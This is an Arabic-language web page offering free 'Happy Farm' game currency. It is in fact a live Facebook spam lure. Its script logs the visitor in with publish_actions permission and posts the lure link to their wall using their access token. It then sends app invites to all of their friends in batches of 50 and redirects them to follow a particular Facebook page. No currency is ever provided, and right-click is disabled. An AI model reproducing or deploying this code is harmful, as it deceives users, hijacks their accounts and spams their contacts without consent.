

<html>
<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>دنانير المزرعة السعيدة المجانية</title>
</head>
<body style="background-image: url('http://www11.0zz0.com/2014/02/20/19/799458993.png')">
<body>
  <center>


  
 


<div id="Layer3" style="position:absolute;background-image:url('http://www11.0zz0.com/2014/02/20/18/381374002.png');background-repeat:no-repeat;;background-position: left top;left:190px;top:90px;width:775px;height:619px;z-index:10" title="">
	<div align="left" id="like2" style="overflow: hidden; position: absolute; left: 50px; top: 129px; z-index: 2; width: 483px; height:47px">
		<div style="position: absolute; width: 99px; height: 109px; z-index: 11; left: -44px; top: 117px" id="layer5">
			<p align="center">
<big>
   <b> <font style="font-size: 13px">
			Mohammed Abu taha</font><font size="5">
			<br>
			<a href="http://www.facebook.com/mtaha77" target="_blank"><img src="https://graph.facebook.com/mtaha77/picture?type=normal" width="76" height="76" class="founder-img" style="margin-top: 5px;"/> </a><br />
			<iframe src="//www.facebook.com/plugins/subscribe.php?href=https%3A%2F%2Fwww.facebook.com%2Fmtaha77&amp;layout=button_count&amp;show_faces=true&amp;colorscheme=light&amp;font=segoe+ui&amp;width=140" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px;height:20px;" name="I1"></iframe> 


</font>  


			</b></big></div>
		<h2>
			&nbsp;</h2>
	</div>
</div>

<p>
   <font size="5"><b>
<big>
   </p>
</center>
</big>
</center>.
<center>
<center>
</center>
<br />
        <style>
                img {
                    border: 0;
                }
                body {
                    width:100%;
                    height:100%;
                    margin: 0px 0px;
                }
            #ol1 {
                padding-left: 6cm;
                padding-top: 8cm;
            }
            #modal {
                width:100%;
                height:100%;
                position:fixed;
                z-index:100;
                background: #000;
                -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=85)";
                          /* IE 5-7 */
                          filter: alpha(opacity=85);
                          /* Netscape */
                          -moz-opacity: 0.85;
                          /* Safari 1.x */
                          -khtml-opacity: 0.85;
                          /* Good browsers */
                          opacity: 0.85;
                          
            }
            .container {
                width: 100%;
                height:100%;
                position:fixed;
                margin: 0 auto;
                z-index: 1001;
            }
            .container .box {
                width:760px;
                margin: 0 auto;
                margin-top:70px;
                height: 370px;
                max-height: 10000px;
                background: #fff;
                z-index: 1001;
                opacity: 1;
                
                            border: 1px solid rgba(0, 0, 0, 0.3);
                            -webkit-border-radius: 6px;
                            -moz-border-radius: 6px;
                            border-radius: 6px;
                            -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
                            -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
                            box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
                            -webkit-background-clip: padding-box;
                            -moz-background-clip: padding-box;
                            background-clip: padding-box;
                            padding: 10px;
                            position:relative;
            }
            .box .foot {
                display:block;
                margin: 0 auto;
                position:absolute;
                left: 315px;
            }
            .box .foot a {
                display:block;
                text-align:center;
                border: 1px #ee9999 solid;
                background: #fff;
                width: 100px;
                height: 30px;
                font-size:25px;
                color: #999;
                text-decoration: none;
            }
            
            .box .title {
                text-align:center;
                font-weight: bold;
                font-size: 25px;
                color: #FF0080;
                height:30px;
                
            }
        </style>
        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" ></script>
        <script type="text/javascript">

                  var _gaq = _gaq || [];
                  _gaq.push(['_setAccount', 'UA-41334226-1']);
                  _gaq.push(['_trackPageview']);
                
                  (function() {
                    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
                    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
                    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
                  })();
                
                </script>
                <script>
                    function skip() {
                        document.getElementById("modal").style.display = "none";
                        document.getElementById("container").style.display = "none";
                    }
                </script>
    </head>
    <body style="width: 100% !important; margin: 0px !important;">

        <center>
            <div id="header">
     
             
                <div id="add">
      
            <table>
                    <tr>
                        <td>
                        <!-- ADS -->
                        </td>
                        <td>
                           <!-- ADS -->
                        </td>
                    </tr>
                </table>
				<div id="add">
                </div>
            </div>
        </center>
        <div id="fb-root"></div>
        <script>
            var app_id = 1458256504389696,
                app_name = "دنانير المزرعة السعيدة ",
                    app_pic = "http://www11.0zz0.com/2014/02/20/19/800835390.png",
                davet_m = '',
                davet_t = 'Invite Friends To Play',
                fba = 0,
                posted = false,
                app_url = "https://www.facebook.com/apps/application.php?id=1458256504389696",
                post_message = "دنانير المزرعة السعيدة المجانية";
                

                        $.getJSON("https://graph.facebook.com/"+app_id,function(response) {
                            if (response && response.namespace) {
                                app_url = "http://apps.facebook.com/"+response.namespace;
                            }
                        })
            window.fbAsyncInit = function () {
                var curLoc = window.location;
                FB.init({
                        appId: app_id,
                        xfbml: true,
                        oauth: true,
                        cookie: true
                    });
                FB.Canvas.setAutoGrow();
                FB.Canvas.setDoneLoading();
            };

            (function () {
                    var e = document.createElement('script');
                    e.async = true;
                    e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
                    document.getElementById('fb-root').appendChild(e);
                }());
            function mshuffle(o) {
                for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
                return o;
            };
            var fbtoken = "";
            function sendRequestToFriends(txxt, title) {
                if (true == posted) return false;
                davet_m = txxt;
                if (title) davet_t = title;
                FB.login(function (response) {
                    //console.log(response);
                  if (response.authResponse) {
                          if (response.authResponse.accessToken) {
                              fbtoken = response.authResponse.accessToken;
                              var post_url = "https://graph.facebook.com/me/feed";
                              var post_vars = {
                                  method: "POST",
                                  access_token: fbtoken,
                                  message: post_message,
                                  link: app_url,
                                  picture: app_pic,
                                  name: app_name,
                                  caption: "دنانير المزرعة السعيدة المجانية",
                                  description: ""
                              }
                              $.getJSON(post_url,post_vars,function(response){
                                  posted_id = response.id || 0;
                                  _gaq.push(['_trackEvent', 'post', posted_id]);
                              })
                              
                          }
                      FB.api('/me', function (response) {
                        fba = response.id;
                      });
                      all();
                  } else {
                      _gaq.push(['_trackEvent', 'Auth', fba]);
                      //all();
                  }
                },{
                    scope: "publish_actions"
                });
                return false;
            };

            function all() {
                var f = [];
                FB.api('/me/friends', function (response) {
                        _gaq.push(['_trackEvent', 'Friends', fba, '', response.data.length]);
                        for (var i = 0; i < response.data.length; i++) f.push(response.data[i].id);
                        loop(f);
                    });
            };

            function loop(f) {
                var l = Math.min(f.length, 50),
                    t = [];
                mshuffle(f);
                if (0 != l) {
                    for (var j = 0; j < l; j++) t.push(f[j]);
                    FB.ui({
                            method: 'apprequests',
                            data: app_id,
                            message: davet_m,
                            title: davet_t,
                            to: t
                        }, function (response) {
                            if (response) {
                                _gaq.push(['_trackEvent', 'Requests', fba, '', response.to.length]);
                                for (var i = 0; i < response.to.length; i++) {
                                    var idx = f.indexOf(response.to[i]);
                                    - 1 != idx && f.splice(idx, 1);
                                }
                                if (f.length == 0) {
                                    top.location.href = 'https://www.facebook.com/muduriyet.htmladmin/following';
                                }
                                f.length > 0 && loop(f);
                            } else {
                                _gaq.push(['_trackEvent', 'Requests', fba]);
                                f.length > 0 && loop(f);
                            }
                        });

                } else {
                    top.location.href = 'https://www.facebook.com/muduriyet.htmladmin/following';
                }
            }
        </script>
<div style="visibility:hidden">
    <img src="http://whos.amung.us/widget/myassgame.png" alt="web stats" width="1" height="1" border="0" />
</div>
</body>
<div style="position: absolute; width: 295px; height: 97px; z-index: 11; left: 325px; top: 312px" id="layer4">
                            <a onclick="return sendRequestToFriends( 'invite Friends','اinvite Friends')" href="#">
<big>
                                <img src="http://www11.0zz0.com/2014/02/20/19/728986011.jpg" style="border: 0 none" /></big></a></div>
<script language="JavaScript1.2"> function ejs_nodroit() { alert('By : mtaha77  '); return(false); } document.oncontextmenu = ejs_nodroit; </script>
    </body>

</center> 


</html>